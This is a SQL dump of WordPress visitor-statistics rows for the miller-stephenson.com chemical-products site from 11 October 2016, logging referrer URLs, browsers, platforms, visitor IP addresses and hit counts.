INSERT INTO `wp_statistics_visitor` VALUES (2735, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Macintosh', '49.0', '', '71.171.27.92', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2736, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.73.144.50', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2737, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '61.134.120.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2738, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '202.100.170.113', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2739, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwiFpN_Zg9PPAhXMF5oKHUlVCmIQFghjMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA&bvm=bv.135475266,bs.2,d.bGg', 'MSIE', 'Windows', '11.0', '', '165.156.24.4', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2740, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2741, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjQ8ffwhNPPAhWJWx4KHftbAEgQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.dmo', 'MSIE', 'Windows', '11.0', '', '12.216.216.3', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2742, '2016-10-11', 'https://www.google.com.mx/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwja_ruchNPPAhWl1IMKHc86C4cQFggzMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '189.211.19.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2743, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2744, '2016-10-11', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '200.38.16.46', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2745, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.124.58.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2746, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '162.216.105.211', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2747, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.87', '', '207.148.181.34', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2748, '2016-10-11', 'https://www.miller-stephenson.com/product/vazo-88/', 'MSIE', 'Windows', '11.0', '', '206.167.137.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2749, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '174.219.4.96', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2750, '2016-10-11', 'https://www.google.com/afs/ads?q=high%20temperature%20epoxy&lo=true&adpage=1&adrep=3&r=m&fexp=21404%2C7000107&client=infospace-syn-pch&channel=pch7&hl=en&adsafe=high&type=0&oe=UTF-8&ie=UTF-8&jsei=3&format=p3%7Cn4&ad=n4p3&nocache=5811476199232182&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Cl1%2Csr1&bsl=10&u_his=2&u_tz=-240&dt=1476199232184&u_w=1333&u_h=750&biw=1321&bih=629&psw=1321&psh=1308&frm=0&uio=uv3cs1lo1va1sr1sl1as3-lHwi555ff2st16sd12sv13da0-lhwi555ff2st16sd12sv13da0&jsv=91621&rurl=https%3A%2F%2Fsearch.pch.com%2Fsearch%3Fq%3Dhigh%2Btemperature%2Bepoxy%26cat%3D&referer=https%3A%2F%2Fsearch.pch.com%2F%3Futm_source%3Demail%26utm_medium%3Dsearch_swemail%26utm_campaign%3D16S4202%26tp%3Di-H43-8l-IJc-5i56hc-1c-6j7y-1c-5hvaXw-a39ZV', 'Edge', 'Windows', '14.14393', '', '68.119.170.113', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2751, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwjw6JOch9PPAhWGSyYKHVY_D7YQFggoMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fquik-freeze-ms-242n%2F&usg=AFQjCNFVmCGtC1tqzs6rUvFoPwc9KLYe5w&bvm=bv.135258522,d.eWE', 'MSIE', 'Windows', '11.0', '', '12.46.184.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2752, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '10.35.7.23', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2753, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwieso-LidPPAhVC6CYKHZBoBaoQFggpMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '192.55.208.11', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2754, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '12.7.52.250', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2755, '2016-10-11', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '207.228.70.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2756, '2016-10-11', 'https://www.google.co.uk/', 'Firefox', 'Windows', '49.0', '', '31.6.74.194', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2757, '2016-10-11', 'https://www.google.co.za/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwj3k9injNPPAhXBOhQKHejzDsYQFghNMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fgpl-105%2F&usg=AFQjCNHJiJYWXJOXZJmr6efhjvhnNDJDgA&sig2=7nKQM1ekTObWl4Re6sbq7A&bvm=bv.135258522,d.bGs', 'MSIE', 'Windows', '11.0', '', '217.89.113.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2758, '2016-10-11', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '86.155.101.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2759, '2016-10-11', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.8.0', '', '5.53.143.108', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2760, '2016-10-11', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '70.27.110.129', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2761, '2016-10-11', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '49.0.2623.112', '', '66.226.207.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2762, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18449', '', '173.167.26.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2763, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.15.220.29', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2764, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '76.176.180.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2765, '2016-10-11', 'https://r.search.yahoo.com/_ylt=A0LEViVTDf1X9egA5X4nnIlQ;_ylu=X3oDMTEyZnZrZmxkBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjI2OTFfMQRzZWMDc3I-/RV=2/RE=1476230611/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=oMleYMKGPvqOLWx3djiwObPhFtY-', 'Firefox', 'Windows', '49.0', '', '184.168.224.35', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2766, '2016-10-11', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '49.0', '', '184.168.224.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2767, '2016-10-11', 'https://www.miller-stephenson.com/chemical-products/', 'Firefox', 'Windows', '49.0', '', '184.168.224.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2768, '2016-10-11', 'https://www.miller-stephenson.com/chemical-products/', 'Firefox', 'Windows', '49.0', '', '184.168.224.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2769, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.213.22.250', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2770, '2016-10-11', 'https://www.miller-stephenson.com/chemical-products/', 'Firefox', 'Windows', '49.0', '', '184.168.224.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2771, '2016-10-11', 'https://www.miller-stephenson.com/chemical-products/', 'Firefox', 'Windows', '49.0', '', '184.168.224.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2772, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2773, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.81', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2774, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2775, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2776, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.7.225.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2777, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2778, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '100.13.76.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2779, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.103', '', '143.16.83.254', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2780, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.117.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2781, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '146.184.0.114', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2782, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.227.251.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2783, '2016-10-11', 'https://www.bing.com/search?q=miller%20stephenson%20ms-111&qs=n&form=QBRE&pq=miller%20stephenson%20ms-111&sc=8-24&sp=-1&sk=&cvid=0B3A2D0964B3463C99C0DB6F61CB8234', 'MSIE', 'Windows', '11.0', '', '158.147.103.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2784, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.121.210.87', '000', 2607, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2785, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '167.115.115.3', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2786, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2787, '2016-10-11', 'https://www.google.com', 'Firefox', 'Windows', '47.0', '', '113.22.175.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2788, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '22.0.1229.94', '', '45.55.155.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2789, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2790, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.208', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2791, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 118, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2792, '2016-10-11', 'https://www.miller-stephenson.com', 'Klondike', 'Unknown', '1.50', '', '104.193.10.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2793, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '142.112.17.49', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2794, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '107.194.227.91', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2795, '2016-10-11', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjk0bnqm9PPAhVFI4EKHTcLDwoYABAA&sig=AOD64_2hI7_mGgOlaTf8v3i0YSXwILzprg&rct=j&q=&ved=0ahUKEwivmLTqm9PPAhWDdj4KHYOIAbsQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '131.137.245.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2796, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '63.96.14.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2797, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '36.226.93.246', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2798, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.127.164.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2799, '2016-10-11', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2800, '2016-10-11', 'https://www.bing.com/search?q=krytox+nrt+8900&qs=n&form=QBLH&pq=krytox+nrt+89&sc=0-13&sp=-1&sk=&cvid=58141EC799C14CB2A1CCA8236A376409', 'Edge', 'Windows', '13.10586', '', '199.116.246.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2801, '2016-10-11', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwizzL6FoNPPAhVCk34KHVxKDHkYABAA&sig=AOD64_22PrkmlvjiVAuO5X7c27Nb1RzxBA&rct=j&frm=1&q=&ved=0ahUKEwilzLqFoNPPAhUk1oMKHfsKBM0Q0QwIGg&adurl=', 'MSIE', 'Windows', '10.0', '', '142.165.128.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2802, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '182.69.231.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2803, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '193.54.90.194', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2804, '2016-10-11', 'https://www.miller-stephenson.com/?author=1wp-admin', 'Chrome', 'Windows', '14.0.835.186', '', '104.223.17.50', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2805, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjUr5_-odPPAhUozoMKHVkTAecQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135258522,d.amc', 'MSIE', 'Windows', '11.0', '', '98.103.148.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2806, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '205.214.234.14', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2807, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.190.127.71', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2808, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.41', '', '128.111.23.213', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2809, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '47.138.212.52', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2810, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.231.92.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2811, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.251.123.42', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2812, '2016-10-11', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '107.72.164.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2813, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi--dzfpNPPAhUTJIEKHR-zCwgYABAL&sig=AOD64_07ih46Pjnk8hyKkrJB1A1eDYYN_w&rct=j&q=&ved=0ahUKEwjj1NjfpNPPAhXCKyYKHZlQBk4Q0QwIogE&adurl=', 'MSIE', 'Windows', '11.0', '', '97.65.2.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2814, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.174.98.70', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2815, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.231.142.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2816, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjUiZD2o9PPAhVGbH4KHVUDDW4YABAF&sig=AOD64_0Ny6-s3jl4RYrnKqSzhkAMk1ESyw&rct=j&q=&ved=0ahUKEwj6lo32o9PPAhUPwmMKHZwACQEQ0QwIhwE&adurl=', 'MSIE', 'Windows', '11.0', '', '199.102.108.16', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2817, '2016-10-11', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '32.0.1700.107', '', '186.206.255.54', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2818, '2016-10-11', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '88.250.224.192', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2819, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.82', '', '199.107.68.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2820, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '192.104.67.222', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2821, '2016-10-11', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwiC36vnqNPPAhVHWoYKHUQdDasYABAE&sig=AOD64_2AUfeWhiVOQ-KVYcN5k-K0dH47pg&rct=j&q=&ved=0ahUKEwiEvajnqNPPAhWJWT4KHeH-DwcQ0QwIKQ&adurl=', 'MSIE', 'Windows', '11.0', '', '98.143.243.82', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2822, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '208.85.193.19', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2823, '2016-10-11', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '177.206.30.155', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2824, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '152.27.57.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2825, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.38.88.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2826, '2016-10-11', 'https://www.miller-stephenson.com/[site_url]/terms-conditions', 'MSIE', 'Windows', '9.0', '', '182.118.20.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2827, '2016-10-11', 'https://r.duckduckgo.com/', 'MSIE', 'Windows', '11.0', '', '50.78.228.225', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2828, '2016-10-11', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.46.249.173', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2829, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '184.189.247.131', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2830, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '108.200.82.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2831, '2016-10-11', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.1.9', '', '75.28.97.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2832, '2016-10-11', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2833, '2016-10-11', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.160.12.104', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2834, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.137.100.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2835, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '18.58.7.128', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2836, '2016-10-11', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '119.136.185.23', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2837, '2016-10-11', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2838, '2016-10-11', 'https://www.miller-stephenson.com/product/pfpe-re-move-ms-250252/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.104.67.221', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2839, '2016-10-11', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '192.104.67.221', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2840, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjBotiLtNPPAhWCPz4KHeuwCbgQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Frelease_agents.html&usg=AFQjCNEtml3Wnf9B2NvctrDFppdhnpqPXA&bvm=bv.135258522,d.cWw', 'MSIE', 'Windows', '7.0', '', '64.184.0.98', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2841, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.200.78.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2842, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '148.188.192.60', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2843, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwin4YaNtdPPAhUIBWkKHXi3CG4YABAG&sig=AOD64_2yTWawi8xeB9LorldUai86JqZR-A&rct=j&q=&ved=0ahUKEwiOl4KNtdPPAhUGPCYKHTejDAcQ0QwILA&adurl=', 'MSIE', 'Windows', '11.0', '', '192.136.16.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2844, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiWvpagttPPAhWCH4YKHRaUCDoYABAA&sig=AOD64_1jJAMwBib0wkuUtScp_T3KZAUd8w&rct=j&q=&ved=0ahUKEwj7-JKgttPPAhXKMx4KHVSHCNwQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '208.178.169.194', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2845, '2016-10-11', 'https://www.google.com.mx/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.81.196.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2846, '2016-10-11', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '75.133.98.86', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2847, '2016-10-11', 'https://www.bing.com/search?q=miller-stephsen+ms-755&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '70.91.220.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2848, '2016-10-11', 'https://www.bing.com/search?q=miller+stephnenson&src=IE-TopResult&FORM=IETR02&conversationid=', 'MSIE', 'Windows', '11.0', '', '65.69.80.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2849, '2016-10-11', 'https://www.google.com/url?url=https://www.miller-stephenson.com/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiggPSjutPPAhXJWT4KHYVGDwYQFggUMAA&usg=AFQjCNHVMV3tSuqMIrrBe8ycLmdO3Xacdw', 'MSIE', 'Windows', '7.0', '', '166.20.224.12', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2850, '2016-10-11', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjTqKvFutPPAhVCWYYKHZ4VBVcYABAA&sig=AOD64_3upLkAIh1LHZwusTJooB5-zRASCw&rct=j&q=&ved=0ahUKEwjIoKbFutPPAhXGOD4KHbzkBgAQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '136.2.1.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2851, '2016-10-11', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.116', '', '130.15.99.178', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2852, '2016-10-11', 'https://www.google.com', 'Firefox', 'Windows', '43.0', '', '173.9.248.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2853, '2016-10-11', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_lMbBu9PPAhWFWj4KHUMhCOwQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q', 'MSIE', 'Windows', '11.0', '', '198.137.214.33', '000', 21, 0); 
